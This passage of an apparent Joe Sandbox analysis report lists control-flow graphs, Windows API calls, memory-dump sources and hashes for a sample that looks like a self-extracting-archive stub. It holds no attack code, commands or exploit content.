                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$CreateErrorLast$Time
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1999340476-0
                                                                                                                    • Opcode ID: 3eb2c95a2ba877fd5ae6b8dea7efb8fb9a3e4e8ab19f07e06b2d8af0a4b604a6
                                                                                                                    • Instruction ID: 5892f7571349a1a18785edd2a6fe026c00f2da43cc5a5201250b28f237cd8d8e
                                                                                                                    • Opcode Fuzzy Hash: 3eb2c95a2ba877fd5ae6b8dea7efb8fb9a3e4e8ab19f07e06b2d8af0a4b604a6
                                                                                                                    • Instruction Fuzzy Hash: EC3102B09443456FE7309F28CC4ABDBBBD4BB04320F100B39F9A5961D1D3A8A984CB99

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1056 5b568-5b581 PeekMessageW 1057 5b583-5b597 GetMessageW 1056->1057 1058 5b5bc-5b5be 1056->1058 1059 5b599-5b5a6 IsDialogMessageW 1057->1059 1060 5b5a8-5b5b6 TranslateMessage DispatchMessageW 1057->1060 1059->1058 1059->1060 1060->1058
                                                                                                                    APIs
                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0005B579
                                                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0005B58A
                                                                                                                    • IsDialogMessageW.USER32(00010458,?), ref: 0005B59E
                                                                                                                    • TranslateMessage.USER32(?), ref: 0005B5AC
                                                                                                                    • DispatchMessageW.USER32(?), ref: 0005B5B6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Message$DialogDispatchPeekTranslate
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1266772231-0
                                                                                                                    • Opcode ID: 45b3ed36ed5c53babd2e2a2812c7c2c56e5fb2d33fa5ad6d8b6af09e36dda641
                                                                                                                    • Instruction ID: d626c416713cf71d7ce1d6ab718d51972de7b8c459fcb41269268cfbd3310480
                                                                                                                    • Opcode Fuzzy Hash: 45b3ed36ed5c53babd2e2a2812c7c2c56e5fb2d33fa5ad6d8b6af09e36dda641
                                                                                                                    • Instruction Fuzzy Hash: 89F0D071A0151AAB9B209BE5DC4DEDB7FBCEF063917404415B915D2010FB38E609CBB0

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1061 5abab-5abca GetClassNameW 1062 5abf2-5abf4 1061->1062 1063 5abcc-5abe1 call 51fbb 1061->1063 1064 5abf6-5abf9 SHAutoComplete 1062->1064 1065 5abff-5ac01 1062->1065 1068 5abf1 1063->1068 1069 5abe3-5abef FindWindowExW 1063->1069 1064->1065 1068->1062 1069->1068
                                                                                                                    APIs
                                                                                                                    • GetClassNameW.USER32(?,?,00000050), ref: 0005ABC2
                                                                                                                    • SHAutoComplete.SHLWAPI(?,00000010), ref: 0005ABF9
                                                                                                                      • Part of subcall function 00051FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0004C116,00000000,.exe,?,?,00000800,?,?,?,00058E3C), ref: 00051FD1
                                                                                                                    • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0005ABE9
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                                                    • String ID: EDIT
                                                                                                                    • API String ID: 4243998846-3080729518
                                                                                                                    • Opcode ID: 3f2b4746585b0a939dd69249c4d9e6ac1887b3dc6d5b9436a1600b24d2e1a9b2
                                                                                                                    • Instruction ID: 7e9de1ea645f03fc06b32e9832bdefa822aba41545af376c8f557d5d1989b3c6
                                                                                                                    • Opcode Fuzzy Hash: 3f2b4746585b0a939dd69249c4d9e6ac1887b3dc6d5b9436a1600b24d2e1a9b2
                                                                                                                    • Instruction Fuzzy Hash: E0F082327006287AEB2056249C09FDB76AC9B47B41F494121BE05A2181D768DA45C6F6

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1070 5dbde-5dc09 call 5ec50 SetEnvironmentVariableW call 50371 1074 5dc0e-5dc12 1070->1074 1075 5dc14-5dc18 1074->1075 1076 5dc36-5dc38 1074->1076 1077 5dc21-5dc28 call 5048d 1075->1077 1080 5dc1a-5dc20 1077->1080 1081 5dc2a-5dc30 SetEnvironmentVariableW 1077->1081 1080->1077 1081->1076
                                                                                                                    APIs
                                                                                                                    • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0005DBF4
                                                                                                                    • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0005DC30
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: EnvironmentVariable
                                                                                                                    • String ID: sfxcmd$sfxpar
                                                                                                                    • API String ID: 1431749950-3493335439
                                                                                                                    • Opcode ID: e7a9aaf7c6ed70b561a1244f8defb1f3cf42c46b7dbf7dc438abc12ef94f74c6
                                                                                                                    • Instruction ID: 033642d1b7718faf2fdda00d3656e0ade81ba6fd074d6b497500603965c4e156
                                                                                                                    • Opcode Fuzzy Hash: e7a9aaf7c6ed70b561a1244f8defb1f3cf42c46b7dbf7dc438abc12ef94f74c6
                                                                                                                    • Instruction Fuzzy Hash: 2DF0A7B2805225A6DB301F94CC06BEF3B98AF04783B444412BD89A9152E6F88984D6A1

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1082 49785-49791 1083 49793-4979b GetStdHandle 1082->1083 1084 4979e-497b5 ReadFile 1082->1084 1083->1084 1085 497b7-497c0 call 498bc 1084->1085 1086 49811 1084->1086 1090 497c2-497ca 1085->1090 1091 497d9-497dd 1085->1091 1088 49814-49817 1086->1088 1090->1091 1094 497cc 1090->1094 1092 497ee-497f2 1091->1092 1093 497df-497e8 GetLastError 1091->1093 1096 497f4-497fc 1092->1096 1097 4980c-4980f 1092->1097 1093->1092 1095 497ea-497ec 1093->1095 1098 497cd-497d7 call 49785 1094->1098 1095->1088 1096->1097 1099 497fe-49807 GetLastError 1096->1099 1097->1088 1098->1088 1099->1097 1102 49809-4980a 1099->1102 1102->1098
                                                                                                                    APIs
                                                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00049795
                                                                                                                    • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 000497AD
                                                                                                                    • GetLastError.KERNEL32 ref: 000497DF
                                                                                                                    • GetLastError.KERNEL32 ref: 000497FE
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast$FileHandleRead
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2244327787-0
                                                                                                                    • Opcode ID: 790c12d788e9bb9f89cab2e4f4b543dae49445680f616b73bbb780ddfa82b785
                                                                                                                    • Instruction ID: 9e25d9aec1a0cd78f118c5b8854f87f2a7436a9bab7a73ba89ee9715d7fb3fb0
                                                                                                                    • Opcode Fuzzy Hash: 790c12d788e9bb9f89cab2e4f4b543dae49445680f616b73bbb780ddfa82b785
                                                                                                                    • Instruction Fuzzy Hash: B71182B0914204EBEF705F68C804A6F37E9FB52320F108639F41A95190DB789E84EB69
                                                                                                                    APIs
                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00063F73,00000000,00000000,?,0006ACDB,00063F73,00000000,00000000,00000000,?,0006AED8,00000006,FlsSetValue), ref: 0006AD66
                                                                                                                    • GetLastError.KERNEL32(?,0006ACDB,00063F73,00000000,00000000,00000000,?,0006AED8,00000006,FlsSetValue,00077970,FlsSetValue,00000000,00000364,?,000698B7), ref: 0006AD72
                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0006ACDB,00063F73,00000000,00000000,00000000,?,0006AED8,00000006,FlsSetValue,00077970,FlsSetValue,00000000), ref: 0006AD80
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3177248105-0
                                                                                                                    • Opcode ID: 30384a8c9751cfa67822b72584ccfe8037f974872e1563cc85fa4d62f4d2b521
                                                                                                                    • Instruction ID: 805634e3e5dcad6ef03e87f1ae9266b728b4b8d4786016b27912c0570bcedddc
                                                                                                                    • Opcode Fuzzy Hash: 30384a8c9751cfa67822b72584ccfe8037f974872e1563cc85fa4d62f4d2b521
                                                                                                                    • Instruction Fuzzy Hash: D201F736B01222AFE7719A68DC44A5B7B99EF067A27110620F90BF7550DB28D9418EE1
                                                                                                                    APIs
                                                                                                                    • GetStdHandle.KERNEL32(000000F5,?,?,?,?,0004D343,00000001,?,?,?,00000000,0005551D,?,?,?), ref: 00049F9E
                                                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,0005551D,?,?,?,?,?,00054FC7,?), ref: 00049FE5
                                                                                                                    • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,0004D343,00000001,?,?), ref: 0004A011
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileWrite$Handle
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4209713984-0
                                                                                                                    • Opcode ID: 81900ae857a0e9c53446641a6b35dd3389beefe1d32acad33bd1e31ae4b7eb1b
                                                                                                                    • Instruction ID: a3bf06e34101c43c8046de908868f8a59295a881b213088797934b774766cad3
                                                                                                                    • Opcode Fuzzy Hash: 81900ae857a0e9c53446641a6b35dd3389beefe1d32acad33bd1e31ae4b7eb1b
                                                                                                                    • Instruction Fuzzy Hash: 1331C2B1244305AFEB14CF20D818BAF77A5FF85710F000539F585AB290C779AD88CBA6
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0004C27E: _wcslen.LIBCMT ref: 0004C284
                                                                                                                    • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,0004A175,?,00000001,00000000,?,?), ref: 0004A2D9
                                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,0004A175,?,00000001,00000000,?,?), ref: 0004A30C
                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,0004A175,?,00000001,00000000,?,?), ref: 0004A329
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateDirectory$ErrorLast_wcslen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2260680371-0
                                                                                                                    • Opcode ID: 19965eea739f3f305751384cee8e7ad42ab96d8e42d1e856ec09ae9557a382b4
                                                                                                                    • Instruction ID: 68fa95ee1dea175f2bd26902dc9213c9bf698795f06eec4639b7c9abc3a781a8
                                                                                                                    • Opcode Fuzzy Hash: 19965eea739f3f305751384cee8e7ad42ab96d8e42d1e856ec09ae9557a382b4
                                                                                                                    • Instruction Fuzzy Hash: 7301F9B174121459FF61AF745C05BEE32889F0B382F040474F841E1081E798CB8196BA
                                                                                                                    APIs
                                                                                                                    • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0006B8B8
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Info
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1807457897-3916222277
                                                                                                                    • Opcode ID: 6871a00a4c2d2944872408eb0e4956464be637c3b2f79a5a16701cdb7f19eeb5
                                                                                                                    • Instruction ID: a4fdf792d8030f0aa043aa11befafe404e71097913295f1a13b4c4beafa4fdc8
                                                                                                                    • Opcode Fuzzy Hash: 6871a00a4c2d2944872408eb0e4956464be637c3b2f79a5a16701cdb7f19eeb5
                                                                                                                    • Instruction Fuzzy Hash: 2B41F8B050428C9EDB218E688C84BFABBEEDB55304F1404EDE69AC7142D3359A85DF71
                                                                                                                    APIs
                                                                                                                    • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,?), ref: 0006AFDD
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: String
                                                                                                                    • String ID: LCMapStringEx
                                                                                                                    • API String ID: 2568140703-3893581201
                                                                                                                    • Opcode ID: 1b9010922f8d1d00e7f00b40c91e8966b22519b5cc37d91034fa72305039ce96
                                                                                                                    • Instruction ID: 645066bc3dd48858afebd4a79dc15cc9bb8ccbd3a0efb4430033d2a2f158c22a
                                                                                                                    • Opcode Fuzzy Hash: 1b9010922f8d1d00e7f00b40c91e8966b22519b5cc37d91034fa72305039ce96
                                                                                                                    • Instruction Fuzzy Hash: 6101E932A05209BBDF126FA0DC05DEE7F62EF09750F018154FE1865161CA3A8971EF95
                                                                                                                    APIs
                                                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,0006A56F), ref: 0006AF55
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CountCriticalInitializeSectionSpin
                                                                                                                    • String ID: InitializeCriticalSectionEx
                                                                                                                    • API String ID: 2593887523-3084827643
                                                                                                                    • Opcode ID: 7cc5a8deb70103773b7c6b69ce0fe47578ba615771fe7a2f8b335f1b8c60e3cc
                                                                                                                    • Instruction ID: 414eae3f321e15d8a352d4002604a434c57defa6c91ff9c78e28fe02d2cf9fae
                                                                                                                    • Opcode Fuzzy Hash: 7cc5a8deb70103773b7c6b69ce0fe47578ba615771fe7a2f8b335f1b8c60e3cc
                                                                                                                    • Instruction Fuzzy Hash: C7F0B431A46218BBDB116F54CC02CAEBFA1EF09751B418074FE0C6A261DA394A10EB8A
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
